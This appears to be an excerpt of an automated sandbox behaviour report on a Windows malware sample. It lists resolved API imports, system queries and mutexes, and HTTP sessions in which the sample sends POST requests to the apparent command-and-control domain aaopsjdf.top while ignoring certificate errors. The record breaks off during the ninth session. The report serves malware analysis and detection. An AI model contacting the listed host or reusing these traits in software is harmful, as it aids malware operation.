Get Address	c:\windows\syswow64\advapi32.dll	function = OpenProcessToken, address_out = 0x77754304	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = FreeSid, address_out = 0x7775412e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitializeSecurityDescriptor, address_out = 0x77754620	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x7775468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x7774c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenThreadToken, address_out = 0x7775432c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x777546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x7774e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetTokenInformation, address_out = 0x7775431c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyKey, address_out = 0x7774c51a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = AdjustTokenPrivileges, address_out = 0x7775418e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SetSecurityDescriptorDacl, address_out = 0x7775415e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x77754608	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = LookupPrivilegeValueW, address_out = 0x777541b3	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetLengthSid, address_out = 0x7775413b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueW, address_out = 0x7774cf31	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegFlushKey, address_out = 0x7776773f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegNotifyChangeKeyValue, address_out = 0x7774e15b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryInfoKeyW, address_out = 0x777546e7	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyW, address_out = 0x7775445b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = InitiateSystemShutdownExW, address_out = 0x7779db3a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x7774df14	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x76a83c71	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76a91e46	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x76af5708	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x763845bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsURLW, address_out = 0x763855bf	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x763acd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x76384745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x763ad32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x763846e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x763886f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x7638c39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76383248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x7638c177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x763b066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x76385331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x7639fbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x7638a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x7637fcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x7639edfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x7637ff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x76385c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x7639c6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x763ace21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x75ad13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x75afe599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x75b209ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x75b0363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75af5ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75b29d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x75b286d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x76965689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x76964de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7696e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x769654f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x76964f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x76965f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x76965ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x769658b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x75f449e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75f3b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x75f3a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75f31b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75f44c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x75f2d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x75f375e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75f4f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75f3ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x75fb18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x766c1d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x761b3eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x7582a415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQuerySystemInformation, address_out = 0x77ccfda0	1	Fn

System (97)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = YKYD69Q	1	Fn
Sleep	duration = -1 (infinite)	12	Fn
Sleep	duration = 600000 milliseconds (600.000 seconds)	1	Fn
Sleep	duration = 20000 milliseconds (20.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:44 (UTC)	3	Fn
Get Time	type = Ticks, time = 31652	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:48 (UTC)	2	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:49 (UTC)	2	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:50 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:51 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:58 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:56:59 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:57:00 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:57:01 (UTC)	1	Fn
Get Info	type = Operating System	52	Fn
Get Info	type = Hardware Information	2	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	7	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	7	Fn

Mutex (24)

Operation	Additional Information	Count	Logfile
Create	mutex_name = E58EFF540968A436E982FCFA1C0445A2	1	Fn
Create	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = A354992B05F4DA0EB1B4AB788E3CE988	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	2	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	4	Fn
Create	mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	3	Fn
Create	mutex_name = F063546A5853AF5508DB5A15751DB34A	2	Fn
Create	mutex_name = F063546A5853AF5508DB5A15751DB34A	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	2	Fn
Release	mutex_name = F063546A5853AF5508DB5A15751DB34A	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = F063546A5853AF5508DB5A15751DB34A	1	Fn
Release	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn

Network Behavior

HTTP Sessions (13)

Information	Value
Total Data Sent	8.93 KB (9149 bytes)
Total Data Received	936.27 KB (958739 bytes)
Contacted Host Count	2
Contacted Hosts	aaopsjdf.top, www.google.com

HTTP Session #1

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (736 bytes)
Data Received	348.46 KB (356828 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ùÐé8, url = aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg	1	Fn
Send HTTP Request	headers = Connection: close ùÐé8, url = aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	31	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	38	Fn Data
Read Response	size = 4096, size_out = 703	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #2

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	www.google.com
Server Port	443
Data Sent	0.33 KB (335 bytes)
Data Received	48.62 KB (49791 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = www.google.com, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close , url = www.google.com/	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 635	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	3	Fn

HTTP Session #3

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (736 bytes)
Data Received	5.65 KB (5788 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ùÐé8, url = aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/	1	Fn
Send HTTP Request	headers = Connection: close ùÐé8, url = aaopsjdf.top/YUEnTzeD/g1/MMP-/d/GEdm38bze8D/qFMQ/	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	1	Fn Data
Read Response	size = 4096, size_out = 1688	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

HTTP Session #4

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (734 bytes)
Data Received	0.23 KB (240 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close Ä, url = aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw	1	Fn
Send HTTP Request	headers = Connection: close Ä, url = aaopsjdf.top/3RWlxZsXKo/6VQe/PctmB8Wly8ri8y/yYLw	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 236	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	3	Fn

HTTP Session #5

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.73 KB (748 bytes)
Data Received	5.65 KB (5788 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ÷Ä, url = aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/	1	Fn
Send HTTP Request	headers = Connection: close ÷Ä, url = aaopsjdf.top/va0u0MjZ9u/rGd5J/INxHsf/X/0/Y/_RlD/X/Q/OA/	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	1	Fn Data
Read Response	size = 4096, size_out = 1688	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	3	Fn

HTTP Session #6

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (732 bytes)
Data Received	156.73 KB (160496 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close H, url = aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A	1	Fn
Send HTTP Request	headers = Connection: close H, url = aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	22	Fn Data
Read Response	size = 4096, size_out = 970	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #7

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (734 bytes)
Data Received	3.15 KB (3228 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close P9, url = aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/	1	Fn
Send HTTP Request	headers = Connection: close P9, url = aaopsjdf.top/yMGvio/o0sO/J9/p/TDdCp0pD/f/3Q2nAw/	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 3224	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

HTTP Session #8

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (724 bytes)
Data Received	200.17 KB (204976 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ã@ó8, url = aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA	1	Fn
Send HTTP Request	headers = Connection: close ã@ó8, url = aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	23	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	9	Fn Data
Read Response	size = 4096, size_out = 402	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #9

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (734 bytes)
Data Received	167.57 KB (171588 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
